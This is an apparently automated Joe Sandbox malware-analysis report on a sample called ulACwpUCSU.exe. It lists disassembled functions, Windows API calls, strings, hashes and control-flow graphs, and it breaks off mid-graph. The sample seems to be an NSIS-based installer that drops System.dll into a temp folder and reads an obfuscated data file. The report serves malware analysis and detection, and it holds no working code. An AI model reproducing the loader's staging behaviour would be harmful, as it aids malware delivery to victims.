                                          • CharNextA.USER32(00000000), ref: 00405886
                                          Strings
                                          • Invaliditetsprocent209\indoktrineringen.rec, xrefs: 00405860
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: CharNext
                                          • String ID: Invaliditetsprocent209\indoktrineringen.rec
                                          • API String ID: 3213498283-2173611331
                                          • Opcode ID: 2ea991d7d7ffd85479a521eab3fc1e567f9f9a9fdda000af801139d1d19966a1
                                          • Instruction ID: 725a23b4e930c3b6c27a7d0cd0e333612dd42f6c53d199a680129a9385ae8045
                                          • Opcode Fuzzy Hash: 2ea991d7d7ffd85479a521eab3fc1e567f9f9a9fdda000af801139d1d19966a1
                                          • Instruction Fuzzy Hash: 74F06253914F516AFB3276645C44B7B5A8CCF56361F188477EE40A62C2C2BC4C618F9A
                                          Function 00404F93 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00404FC2
                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00405013
                                            • Part of subcall function 00404038: SendMessageA.USER32(000104AE,00000000,00000000,00000000), ref: 0040404A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Window$CallMessageProcSendVisible
                                          • String ID:
                                          • API String ID: 3748168415-3916222277
                                          • Opcode ID: a1366604d20516d7a227b416e124a8c8ccbf6a8c92e3cea699473ae65b9a4b61
                                          • Instruction ID: 01da3f5901ddaf9404fa7d81b8fd4ad62d8e53e58d7af57a61279808ed2d7cb1
                                          • Opcode Fuzzy Hash: a1366604d20516d7a227b416e124a8c8ccbf6a8c92e3cea699473ae65b9a4b61
                                          • Instruction Fuzzy Hash: EA018F7110020DABDF209F11DC85E9F3B6AF784758F208037FA04752D1D77A8C92AAAE
                                          Function 004058B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00405D36: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405D43
                                            • Part of subcall function 0040585F: CharNextA.USER32(?,?,Invaliditetsprocent209\indoktrineringen.rec,?,004058CB,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,76CD2EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0,00000000), ref: 0040586D
                                            • Part of subcall function 0040585F: CharNextA.USER32(00000000), ref: 00405872
                                            • Part of subcall function 0040585F: CharNextA.USER32(00000000), ref: 00405886
                                          • lstrlenA.KERNEL32(Invaliditetsprocent209\indoktrineringen.rec,00000000,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,76CD2EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0,00000000), ref: 00405907
                                          • GetFileAttributesA.KERNEL32(Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,00000000,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,76CD2EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0), ref: 00405917
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                          • String ID: Invaliditetsprocent209\indoktrineringen.rec
                                          • API String ID: 3248276644-2173611331
                                          • Opcode ID: 681a1499075d1ef18d3e94b36260b5cb5e6403957cf75bde6daaeed28ee23a5f
                                          • Instruction ID: cee4b60d78671bb78a10d3fddc0396ac835ea714c96625339261d657e7680c9f
                                          • Opcode Fuzzy Hash: 681a1499075d1ef18d3e94b36260b5cb5e6403957cf75bde6daaeed28ee23a5f
                                          • Instruction Fuzzy Hash: 0AF02823105D6026C63233391C09AAF1B95CE86368B24853FFC51B22D1DB3C8863DE7E
                                          Function 004024D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenA.KERNEL32(00000000,00000011), ref: 004024EF
                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040250E
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll, xrefs: 004024DD, 00402502
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: FileWritelstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll
                                          • API String ID: 427699356-4140934786
                                          • Opcode ID: f7e9c7c3a0b030329b9eac82e2999ac8e5cd3652365a72a00433b5ad3c482558
                                          • Instruction ID: 4826b5ec7f58a8945af1d05ae4e09a11cd1e532a13e769836b40841c5f4177c7
                                          • Opcode Fuzzy Hash: f7e9c7c3a0b030329b9eac82e2999ac8e5cd3652365a72a00433b5ad3c482558
                                          • Instruction Fuzzy Hash: 80F054B2A54244BFDB40ABA19E499EB66A4DB40309F10443FB141F61C2D5BC4941A66A
                                          Function 004054E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421500,Error launching installer), ref: 0040550E
                                          • CloseHandle.KERNEL32(?), ref: 0040551B
                                          Strings
                                          • Error launching installer, xrefs: 004054F8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID: Error launching installer
                                          • API String ID: 3712363035-66219284
                                          • Opcode ID: a807c8c1498f9a3ccd34e9273e49e04dcb617f56f5cccdb726230c0895ca6d7f
                                          • Instruction ID: 0ae392a05d3974bec86de51aa2f8a5c28ff0ee3cdd976454f3eed0d5dd72dd2a
                                          • Opcode Fuzzy Hash: a807c8c1498f9a3ccd34e9273e49e04dcb617f56f5cccdb726230c0895ca6d7f
                                          • Instruction Fuzzy Hash: 2BE0BFB4A00209BFEB109FA4ED05F7B76ADEB14745F508561BD11F2160E774A9108A79
                                          Function 004036F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76CD2EE0,004036C9,76CD3410,004034D6,?), ref: 0040370C
                                          • GlobalFree.KERNEL32(005DFE60), ref: 00403713
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403704
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Free$GlobalLibrary
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 1100898210-787714339
                                          • Opcode ID: 86ea4e8f2e330b4051334ac2fa91e3adcb647da4565bec0431381526e270e322
                                          • Instruction ID: 0fe4964e98027e88380181352afc78dea88c0f551701ba437740c6db36bc47f5
                                          • Opcode Fuzzy Hash: 86ea4e8f2e330b4051334ac2fa91e3adcb647da4565bec0431381526e270e322
                                          • Instruction Fuzzy Hash: 0EE0EC7390512097C6215F96AD04B5ABB686B89B62F06842AED407B3A18B746C418BD9
                                          Function 0040580D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ulACwpUCSU.exe,C:\Users\user\Desktop\ulACwpUCSU.exe,80000000,00000003), ref: 00405813
                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ulACwpUCSU.exe,C:\Users\user\Desktop\ulACwpUCSU.exe,80000000,00000003), ref: 00405821
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrlen
                                          • String ID: C:\Users\user\Desktop
                                          • API String ID: 2709904686-3443045126
                                          • Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                          • Instruction ID: ba052d51ab232c33a65bcd29671eceb75c11827358d6bb1c4ef4a0a5cf44e1aa
                                          • Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                          • Instruction Fuzzy Hash: 94D0A77341AD701EE30372109C04B8F6A48CF16300F098462E440B61A0C2780C414BED
                                          Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                          • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                          • GlobalFree.KERNEL32(?), ref: 100011C7
                                          • GlobalFree.KERNEL32(?), ref: 100011F5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2905161694.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2905123603.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000000.00000002.2905192299.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000000.00000002.2905221858.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Global$Free$Alloc
                                          • String ID:
                                          • API String ID: 1780285237-0
                                          • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                          • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                          • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                          • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                          Function 0040592C Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 0040593C
                                          • lstrcmpiA.KERNEL32(00405B5B,00000000), ref: 00405954
                                          • CharNextA.USER32(00405B5B,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 00405965
                                          • lstrlenA.KERNEL32(00405B5B,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 0040596E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                          • Instruction ID: 6acf3bc3cda9f3bfd2525b0ac34aa546eab038af588102683640af0afc927a81
                                          • Opcode Fuzzy Hash: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                          • Instruction Fuzzy Hash: 27F0C232604518FFC7129BA4DD40D9FBBA8EF06360B2500AAE800F7250D274EE019FAA

                                          Execution Graph

                                          Execution Coverage:0%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:100%
                                          Total number of Nodes:1
                                          Total number of Limit Nodes:0
                                          execution_graph 47836 37732b90 LdrInitializeThunk

                                          Executed Functions

                                          Function 377334E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2 377334e0-377334ec LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4e508f00153d2a065b2a04a9b8e05895b3e6b70f070545c2ba15e397553492b8
                                          • Instruction ID: 2ff4235a602b44a6d8dc995741d3964f67a65b3b03f9bfe9a59d67d7ec7d05d9
                                          • Opcode Fuzzy Hash: 4e508f00153d2a065b2a04a9b8e05895b3e6b70f070545c2ba15e397553492b8
                                          • Instruction Fuzzy Hash: E990027161510812D5007559861470A100947D0201F62C926A0414968EC7A5895575A2
                                          Function 37732D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1 37732d10-37732d1c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: cc87bf85d95c4a98c788daa59dfde2b858b432ec8a07afa20d7ed6c3c337cbe1
                                          • Instruction ID: c29aadb9657d1d7d416a1a96b36af5978473b603760d57afe6739bb790f826f9
                                          • Opcode Fuzzy Hash: cc87bf85d95c4a98c788daa59dfde2b858b432ec8a07afa20d7ed6c3c337cbe1
                                          • Instruction Fuzzy Hash: 9D90027121100823D5117559860470B000D47D0241F92C927A0414958ED6668956B121
                                          Function 37732B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 37732b90-37732b9c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2451f7c4012e36fb6a89c334776feea49d35e9e53edb6f900c7505dfd5615ee8
                                          • Instruction ID: 3b7b665a97abc663f2ba0ddd765505c1263967d901db8bcba7d303a56eac4a31
                                          • Opcode Fuzzy Hash: 2451f7c4012e36fb6a89c334776feea49d35e9e53edb6f900c7505dfd5615ee8
                                          • Instruction Fuzzy Hash: E790027121108C12D5107559C50474E000947D0301F56C926A4414A58EC6A588957121

                                          Non-executed Functions

                                          Function 37728540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 516 37728540-377285a1 517 377650a2-377650a8 516->517 518 377285a7-377285b8 516->518 517->518 519 377650ae-377650bb GetPEB 517->519 519->518 520 377650c1-377650c4 519->520 521 377650c6-377650d0 520->521 522 377650e1-37765107 call 37732c00 520->522 521->518 523 377650d6-377650df 521->523 522->518 527 3776510d-37765111 522->527 525 37765138-3776514c call 376f53c0 523->525 532 37765152-3776515e 525->532 527->518 529 37765117-3776512c call 37732c00 527->529 529->518 536 37765132 529->536 534 37765367-37765373 call 37765378 532->534 535 37765164-37765178 532->535 534->518 538 37765196-3776520c 535->538 539 3776517a 535->539 536->525 544 37765245-37765248 538->544 545 3776520e-37765240 call 376efcf0 538->545 542 3776517c-37765183 539->542 542->538 543 37765185-37765187 542->543 546 3776518e-37765190 543->546 547 37765189-3776518c 543->547 549 3776524e-3776529f 544->549 550 3776531f-37765322 544->550 556 37765358-3776535d call 3777a130 545->556 546->538 551 37765360-37765362 546->551 547->542 557 377652a1-377652d7 call 376efcf0 549->557 558 377652d9-3776531d call 376efcf0 * 2 549->558 550->551 552 37765324-37765353 call 376efcf0 550->552 551->532 552->556 556->551 557->556 558->556
                                          Strings
                                          • Critical section debug info address, xrefs: 3776522A, 37765339
                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 377652ED
                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 37765215, 377652A1, 37765324
                                          • 8, xrefs: 377650EE
                                          • Critical section address., xrefs: 3776530D
                                          • Address of the debug info found in the active list., xrefs: 377652B9, 37765305
                                          • Thread identifier, xrefs: 37765345
                                          • Thread is in a state in which it cannot own a critical section, xrefs: 3776534E
                                          • double initialized or corrupted critical section, xrefs: 37765313
                                          • Invalid debug info address of this critical section, xrefs: 377652C1
                                          • corrupted critical section, xrefs: 377652CD
                                          • undeleted critical section in freed memory, xrefs: 37765236
                                          • Critical section address, xrefs: 37765230, 377652C7, 3776533F
                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 377652D9
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                          • API String ID: 0-2368682639
                                          • Opcode ID: 5cda7aaaec6b14255028f4e72f20c25a329578f7d762ce49924f70b4e9836fb0
                                          • Instruction ID: c41be4f4144226ae7bd2a08ab2ddf1bac2f221257ec234d91512e27684867617
                                          • Opcode Fuzzy Hash: 5cda7aaaec6b14255028f4e72f20c25a329578f7d762ce49924f70b4e9836fb0
                                          • Instruction Fuzzy Hash: 2381DFB1901309AFEB10CF95C958FAEBBB9FB08B64F204559F804BB240C775A844EF61
                                          Function 3779FDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 634 3779fdf4-3779fe16 call 37747be4 637 3779fe18-3779fe30 RtlDebugPrintTimes 634->637 638 3779fe35-3779fe4d call 376e7662 634->638 642 377a02d1-377a02e0 637->642 643 3779fe53-3779fe69 638->643 644 377a0277 638->644 646 3779fe6b-3779fe6e 643->646 647 3779fe70-3779fe72 643->647 645 377a027a-377a02ce call 377a02e6 644->645 645->642 648 3779fe73-3779fe8a 646->648 647->648 650 3779fe90-3779fe93 648->650 651 377a0231-377a023a GetPEB 648->651 650->651 653 3779fe99-3779fea2 650->653 655 377a0259-377a025e call 376eb910 651->655 656 377a023c-377a0257 GetPEB call 376eb910 651->656 657 3779febe-3779fed1 call 377a0835 653->657 658 3779fea4-3779febb call 376ffed0 653->658 661 377a0263-377a0274 call 376eb910 655->661 656->661 669 3779fedc-3779fef0 call 376e753f 657->669 670 3779fed3-3779feda 657->670 658->657 661->644 673 377a0122-377a0127 669->673 674 3779fef6-3779ff02 GetPEB 669->674 670->669 673->645 675 377a012d-377a0139 GetPEB 673->675 676 3779ff70-3779ff7b 674->676 677 3779ff04-3779ff07 674->677 678 377a013b-377a013e 675->678 679 377a01a7-377a01b2 675->679 680 377a0068-377a007a call 37702710 676->680 681 3779ff81-3779ff88 676->681 682 3779ff09-3779ff24 GetPEB call 376eb910 677->682 683 3779ff26-3779ff2b call 376eb910 677->683 685 377a015d-377a0162 call 376eb910 678->685 686 377a0140-377a015b GetPEB call 376eb910 678->686 679->645 690 377a01b8-377a01c3 679->690 704 377a0110-377a011d call 377a0d24 call 377a0835 680->704 705 377a0080-377a0087 